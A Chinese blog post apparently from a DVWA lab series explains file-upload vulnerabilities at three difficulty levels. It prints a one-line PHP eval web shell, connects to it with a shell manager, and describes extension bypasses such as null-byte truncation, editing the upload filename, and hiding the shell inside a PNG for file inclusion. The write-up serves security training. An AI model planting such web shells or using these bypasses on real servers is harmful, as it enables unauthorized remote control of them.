<!DOCTYPE html>












  


<html class="theme-next muse use-motion" lang>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">












  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.2.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.2.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.2.0">


  <link rel="mask-icon" href="/images/logo.svg?v=7.2.0" color="#222">






<link rel="stylesheet" href="/css/main.css?v=7.2.0">






<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">








<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.2.0',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    search: {
      root: '/',
      path: ''
    },
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: 'Copy',
      copy_success: 'Copied',
      copy_failure: 'Copy failed'
    }
  };
</script>

  <meta name="description" content="hack.php内容如下： 123&amp;lt;?php     @eval($_POST[&apos;apple&apos;])?&amp;gt;  Low直接上传执行命令直接将 hack.php上传到服务器上。发现服务器提供了文件目录路径。  打开 nodejs版本的菜刀。新建连接：  其中的参数：  Shell url 是上传的php文件所在位置 shell pwd是你post指定的参数，这里是 apple  完成之后，软件">
<meta name="keywords" content="安全 DVWA">
<meta property="og:type" content="article">
<meta property="og:title" content="DVWA（四）文件上传漏洞">
<meta property="og:url" content="http://yoursite.com/2019/06/27/DVWA（四）文件上传/index.html">
<meta property="og:site_name" content="楚河">
<meta property="og:description" content="hack.php内容如下： 123&amp;lt;?php     @eval($_POST[&apos;apple&apos;])?&amp;gt;  Low直接上传执行命令直接将 hack.php上传到服务器上。发现服务器提供了文件目录路径。  打开 nodejs版本的菜刀。新建连接：  其中的参数：  Shell url 是上传的php文件所在位置 shell pwd是你post指定的参数，这里是 apple  完成之后，软件">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://public-oss-ipic.oss-cn-shenzhen.aliyuncs.com/2019-07-27-092319.png">
<meta property="og:image" content="https://public-oss-ipic.oss-cn-shenzhen.aliyuncs.com/2019-07-27-092323.png">
<meta property="og:image" content="https://public-oss-ipic.oss-cn-shenzhen.aliyuncs.com/2019-07-27-092326.png">
<meta property="og:image" content="http://yoursite.com/2019/06/27/DVWA（四）文件上传/assets/1553777412566.png">
<meta property="og:image" content="http://yoursite.com/2019/06/27/DVWA（四）文件上传/assets/1553777658509.png">
<meta property="og:image" content="http://yoursite.com/2019/06/27/DVWA（四）文件上传/assets/1553777822822.png">
<meta property="og:image" content="https://public-oss-ipic.oss-cn-shenzhen.aliyuncs.com/2019-07-27-092334.png">
<meta property="og:image" content="https://public-oss-ipic.oss-cn-shenzhen.aliyuncs.com/2019-07-27-092338.png">
<meta property="og:updated_time" content="2019-07-27T09:30:45.158Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="DVWA（四）文件上传漏洞">
<meta name="twitter:description" content="hack.php内容如下： 123&amp;lt;?php     @eval($_POST[&apos;apple&apos;])?&amp;gt;  Low直接上传执行命令直接将 hack.php上传到服务器上。发现服务器提供了文件目录路径。  打开 nodejs版本的菜刀。新建连接：  其中的参数：  Shell url 是上传的php文件所在位置 shell pwd是你post指定的参数，这里是 apple  完成之后，软件">
<meta name="twitter:image" content="https://public-oss-ipic.oss-cn-shenzhen.aliyuncs.com/2019-07-27-092319.png">





  
  
  <link rel="canonical" href="http://yoursite.com/2019/06/27/DVWA（四）文件上传/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  
  <title>DVWA（四）文件上传漏洞 | 楚河</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">楚河</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>Home</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archives</a>

  </li>

      
      
    </ul>
  

  
    

  

  
</nav>



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
      

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/06/27/DVWA（四）文件上传/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="楚河">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">DVWA（四）文件上传漏洞

              
            
          </h1>
        

        <div class="post-meta">

          
          
          

          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2019-06-27 12:00:00" itemprop="dateCreated datePublished" datetime="2019-06-27T12:00:00+08:00">2019-06-27</time>
            </span>
          

          
            

            
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Edited on</span>
                
                <time title="Modified: 2019-07-27 17:30:45" itemprop="dateModified" datetime="2019-07-27T17:30:45+08:00">2019-07-27</time>
              </span>
            
          

          

          
          

          

          
            
  
  <span class="post-meta-item">
    
    <span class="post-meta-item-icon">
      <i class="fa fa-comment-o"></i>
    </span>
    
      <span class="post-meta-item-text">Comments: </span>
    
  
    <a href="/2019/06/27/DVWA（四）文件上传/#comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2019/06/27/DVWA（四）文件上传/" itemprop="commentCount"></span>
    </a>
  </span>
  
  
          

          <br>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p><code>hack.php</code>内容如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">    @<span class="keyword">eval</span>($_POST[<span class="string">'apple'</span>])</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="Low"><a href="#Low" class="headerlink" title="Low"></a>Low</h3><h4 id="直接上传执行命令"><a href="#直接上传执行命令" class="headerlink" title="直接上传执行命令"></a>直接上传执行命令</h4><p>直接将 <code>hack.php</code>上传到服务器上。发现服务器提供了文件目录路径。</p>
<p><img src="https://public-oss-ipic.oss-cn-shenzhen.aliyuncs.com/2019-07-27-092319.png" alt="1553765149089"></p>
<p>打开 <code>nodejs</code>版本的菜刀。新建连接：</p>
<p><img src="https://public-oss-ipic.oss-cn-shenzhen.aliyuncs.com/2019-07-27-092323.png" alt="1553765215743"></p>
<p>其中的参数：</p>
<ul>
<li><code>Shell url</code> 是上传的php文件所在位置</li>
<li><code>shell pwd</code>是你<code>post</code>指定的参数，这里是 <code>apple</code></li>
</ul>
<p>完成之后，软件就自动连接到<code>php</code></p>
<p><img src="https://public-oss-ipic.oss-cn-shenzhen.aliyuncs.com/2019-07-27-092326.png" alt="1553765359282"></p>
<p>菜刀的原理是利用post请求传递指令，用PHP的eval指令进行执行。（不清楚PHP为什么还会允许 <code>eval</code>指令的存在）</p>
<h3 id="Medium"><a href="#Medium" class="headerlink" title="Medium"></a>Medium</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>( $_POST[ <span class="string">'Upload'</span> ] ) ) &#123; </span><br><span class="line">    <span class="comment">// Where are we going to be writing to? </span></span><br><span class="line">    $target_path  = DVWA_WEB_PAGE_TO_ROOT . <span class="string">"hackable/uploads/"</span>; </span><br><span class="line">    $target_path .= basename( $_FILES[ <span class="string">'uploaded'</span> ][ <span class="string">'name'</span> ] ); </span><br><span class="line"></span><br><span class="line">    <span class="comment">// File information </span></span><br><span class="line">    $uploaded_name = $_FILES[ <span class="string">'uploaded'</span> ][ <span class="string">'name'</span> ]; </span><br><span class="line">    $uploaded_type = $_FILES[ <span class="string">'uploaded'</span> ][ <span class="string">'type'</span> ]; </span><br><span class="line">    $uploaded_size = $_FILES[ <span class="string">'uploaded'</span> ][ <span class="string">'size'</span> ]; </span><br><span class="line"></span><br><span class="line">    <span class="comment">// Is it an image? 注意，这里限定了上传类型必须是 jpg和png</span></span><br><span class="line">    <span class="keyword">if</span>( ( $uploaded_type == <span class="string">"image/jpeg"</span> || $uploaded_type == <span class="string">"image/png"</span> ) &amp;&amp; </span><br><span class="line">        ( $uploaded_size &lt; <span class="number">100000</span> ) ) &#123; </span><br><span class="line"></span><br><span class="line">        <span class="comment">// Can we move the file to the upload folder? </span></span><br><span class="line">        <span class="keyword">if</span>( !move_uploaded_file( $_FILES[ <span class="string">'uploaded'</span> ][ <span class="string">'tmp_name'</span> ], $target_path ) ) &#123; </span><br><span class="line">            <span class="comment">// No </span></span><br><span class="line">            <span class="keyword">echo</span> <span class="string">'&lt;pre&gt;Your image was not uploaded.&lt;/pre&gt;'</span>; </span><br><span class="line">        &#125; </span><br><span class="line">        <span class="keyword">else</span> &#123; </span><br><span class="line">            <span class="comment">// Yes! </span></span><br><span class="line">            <span class="keyword">echo</span> <span class="string">"&lt;pre&gt;&#123;$target_path&#125; succesfully uploaded!&lt;/pre&gt;"</span>; </span><br><span class="line">        &#125; </span><br><span class="line">    &#125; </span><br><span class="line">    <span class="keyword">else</span> &#123; </span><br><span class="line">        <span class="comment">// Invalid file </span></span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'&lt;pre&gt;Your image was not uploaded. We can only accept JPEG or PNG images.&lt;/pre&gt;'</span>; </span><br><span class="line">    &#125; </span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>解决这样的问题主要有三种思路：</p>
<h4 id="结合文件包含漏洞"><a href="#结合文件包含漏洞" class="headerlink" title="结合文件包含漏洞"></a>结合文件包含漏洞</h4><blockquote>
<p>服务器配置中，如果 选项<code>allow_url_fopen 和 allow_url_inc</code>为开启状态，那么就容易导致任意远程代码执行，也就是说，即使你上传的是一个png后缀的文件，通过文件包含也可以进行执行。</p>
</blockquote>
<h4 id="结合命令注入"><a href="#结合命令注入" class="headerlink" title="结合命令注入"></a>结合命令注入</h4><p>在可以注入命令的情况下，也可以直接通过 <code>mv</code>命令将 <code>png</code>命名为 <code>php</code>文件</p>
<h4 id="使用截断规则"><a href="#使用截断规则" class="headerlink" title="使用截断规则"></a>使用截断规则</h4><blockquote>
<p>php有个无法理解的特性就是  <code>magic_quotes_gpc</code>选项，php如果开启这个选项，那个单双引号和反斜线均会加上转义符号，但是这个选项必须人工进行配置，在大多数场景中这个选项都没有开启。因此可以使用特殊字符来绕开上传限制。</p>
</blockquote>
<p>php 在 5.3.4版本以下可以使用<code>%00</code></p>
<p>上传文件修改为 <code>hack.php%00.png</code> 即可。</p>
<p>从源码角度理解(省略较多内容）：</p>
<blockquote>
<p>php底层采用zendparser作为 <code>AST</code>引擎， 调用<code>lex_scan</code>去处理文件名。而这个lex_scan会忽略<code>\00</code>以后的内容。在之后的版本上，PHP已经修复了这个漏洞。</p>
</blockquote>
<h4 id="理解HTTP，改变POST-filename的值"><a href="#理解HTTP，改变POST-filename的值" class="headerlink" title="理解HTTP，改变POST filename的值"></a>理解HTTP，改变POST <code>filename</code>的值</h4><ol>
<li><p>打开浏览器界面。上传一个 <code>hack.png</code>文件</p>
<p><img src="assets/1553777412566.png" alt="1553777412566"></p>
</li>
<li><p>然后修改<code>post</code>信息</p>
</li>
</ol>
<p><img src="assets/1553777658509.png" alt="1553777658509"></p>
<p>​    将<code>hack2.png</code>改为 <code>hack2.php</code>。然后上传就会发现，成功上传了 <code>hack2.php</code></p>
<p><img src="assets/1553777822822.png" alt="1553777822822"></p>
<p>​        </p>
<blockquote>
<p>这种方法之所以能够成功。因为服务器根据<a href="https://tools.ietf.org/html/rfc6266" target="_blank" rel="noopener">RFC6266</a>的标准，会默认将文件名字与 <code>Content-Disposition</code>中的 <code>filename</code>字段内容相对应。而这里仅仅只判断了 <code>content-type</code>。</p>
<p>在大多数场景下，web应用应该给上传文件一个随机的名字，并在保存后判断其类型。</p>
</blockquote>
<h3 id="High级别"><a href="#High级别" class="headerlink" title="High级别"></a>High级别</h3><h4 id="代码写入PNG，和文件包含漏洞一起使用"><a href="#代码写入PNG，和文件包含漏洞一起使用" class="headerlink" title="代码写入PNG，和文件包含漏洞一起使用"></a>代码写入PNG，和文件包含漏洞一起使用</h4><p>高级别安全中，php除了判断文件后缀名是 <code>jpg</code> <code>jpeg</code> <code>png</code>之外，还要判断文件是否含有 <code>图像文件</code>的元数据信息（长、宽）。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>( ( strtolower( $uploaded_ext ) == <span class="string">"jpg"</span> || strtolower( $uploaded_ext ) == <span class="string">"jpeg"</span> || strtolower( $uploaded_ext ) == <span class="string">"png"</span> ) &amp;&amp; </span><br><span class="line">       ( $uploaded_size &lt; <span class="number">100000</span> ) &amp;&amp; </span><br><span class="line">       getimagesize( $uploaded_tmp ) )</span><br></pre></td></tr></table></figure>

<p>这里必须满足一个前提条件：</p>
<ol>
<li>存在文件包含漏洞。即选项<code>allow_url_fopen 和 allow_url_inc</code>为开启状态。</li>
</ol>
<p>伪造一个包含php文件的<code>png</code>文件</p>
<ul>
<li><p>（linux系统）用文本方式打开一个 正常<code>png</code>文件</p>
</li>
<li><p>将一句话木马信息写入文件任意位置</p>
</li>
</ul>
<p><img src="https://public-oss-ipic.oss-cn-shenzhen.aliyuncs.com/2019-07-27-092334.png" alt="1553779727483"></p>
<ul>
<li>利用 <code>文件包含</code>漏洞打开 <code>png</code>位置</li>
<li><img src="https://public-oss-ipic.oss-cn-shenzhen.aliyuncs.com/2019-07-27-092338.png" alt="1553780190594"></li>
</ul>
<blockquote>
<p> 如图，这里通过file打开，response实际上是把文件内容加到正常的payload之上进行返回。也就是<code>Content-Disposition</code>设置为 <code>inline</code>的效果。</p>
</blockquote>
<p>接着，将这个路径放入<code>菜刀</code>， 完成控制。</p>
<h2 id="参考-amp-引用"><a href="#参考-amp-引用" class="headerlink" title="参考 &amp; 引用"></a>参考 &amp; 引用</h2><p><a href="https://blog.csdn.net/zhangzhuangtongxue/article/details/78198191" target="_blank" rel="noopener">截断规则漏洞源码分析</a></p>

      
    </div>

    

    
      
    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      
        
          
        
        <div class="post-tags">
          
            <a href="/tags/安全-DVWA/" rel="tag"># 安全 DVWA</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/06/26/DVWA（三）文件包含/" rel="next" title="DVWA（三）文件包含漏洞">
                <i class="fa fa-chevron-left"></i> DVWA（三）文件包含漏洞
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/06/28/DVWA(五）SQL Injection/" rel="prev" title="DVWA（五）SQL Injection">
                DVWA（五）SQL Injection <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>

  </div>


          </div>
          
  
    
    <div class="comments" id="comments"></div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">

          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  
  <p class="site-author-name" itemprop="name">John Doe</p>
  <div class="site-description motion-element" itemprop="description"></div>
</div>


  <nav class="site-state motion-element">
    
      <div class="site-state-item site-state-posts">
        
          <a href="/archives/">
        
          <span class="site-state-item-count">6</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
    

    

    
      
      
      <div class="site-state-item site-state-tags">
        
        
        
          
        
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">tags</span>
        
      </div>
    
  </nav>













          
          
        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#Low"><span class="nav-number">1.</span> <span class="nav-text">Low</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#直接上传执行命令"><span class="nav-number">1.1.</span> <span class="nav-text">直接上传执行命令</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Medium"><span class="nav-number">2.</span> <span class="nav-text">Medium</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#结合文件包含漏洞"><span class="nav-number">2.1.</span> <span class="nav-text">结合文件包含漏洞</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#结合命令注入"><span class="nav-number">2.2.</span> <span class="nav-text">结合命令注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#使用截断规则"><span class="nav-number">2.3.</span> <span class="nav-text">使用截断规则</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#理解HTTP，改变POST-filename的值"><span class="nav-number">2.4.</span> <span class="nav-text">理解HTTP，改变POST filename的值</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#High级别"><span class="nav-number">3.</span> <span class="nav-text">High级别</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#代码写入PNG，和文件包含漏洞一起使用"><span class="nav-number">3.1.</span> <span class="nav-text">代码写入PNG，和文件包含漏洞一起使用</span></a></li></ol></li></ol><li class="nav-item nav-level-2"><a class="nav-link" href="#参考-amp-引用"><span class="nav-number"></span> <span class="nav-text">参考 &amp; 引用</span></a></li></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>

  

  
</div>


  <div class="powered-by">Powered by <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> v3.9.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.2.0</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    

  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>
















  
  









  
  <script src="/lib/jquery/index.js?v=3.4.1"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>




  <script src="/js/utils.js?v=7.2.0"></script>

  <script src="/js/motion.js?v=7.2.0"></script>



  
  


  <script src="/js/schemes/muse.js?v=7.2.0"></script>



  
  <script src="/js/scrollspy.js?v=7.2.0"></script>
<script src="/js/post-details.js?v=7.2.0"></script>



  <script src="/js/next-boot.js?v=7.2.0"></script>

  

  

  


  























<script>
// GET RESPONSIVE HEIGHT PASSED FROM IFRAME

window.addEventListener("message", function(e) {
  var data = e.data;
  if ((typeof data === 'string') && (data.indexOf('ciu_embed') > -1)) {
    var featureID = data.split(':')[1];
    var height = data.split(':')[2];
    $(`iframe[data-feature=${featureID}]`).height(parseInt(height) + 30);
  }
}, false);
</script>








  
    

<script src="//unpkg.com/valine/dist/Valine.min.js"></script>

<script>
  var GUEST = ['nick', 'mail', 'link'];
  var guest = 'nick,mail,link';
  guest = guest.split(',').filter(function(item) {
    return GUEST.indexOf(item) > -1;
  });
  new Valine({
    el: '#comments',
    verify: false,
    notify: false,
    appId: 'M3i9XhgNiL0VOzYHIUOQqK3o-MdYXbMMI# Your leancloud application appid',
    appKey: 'TRbs8LPF1DnCCQbiOT25aIre# Your leancloud application appkey',
    placeholder: '请留言吧',
    avatar: 'mm',
    meta: guest,
    pageSize: '10' || 10,
    visitor: false,
    lang: 'zh-cn' || 'zh-cn'
  });
</script>

  

</body>
</html>
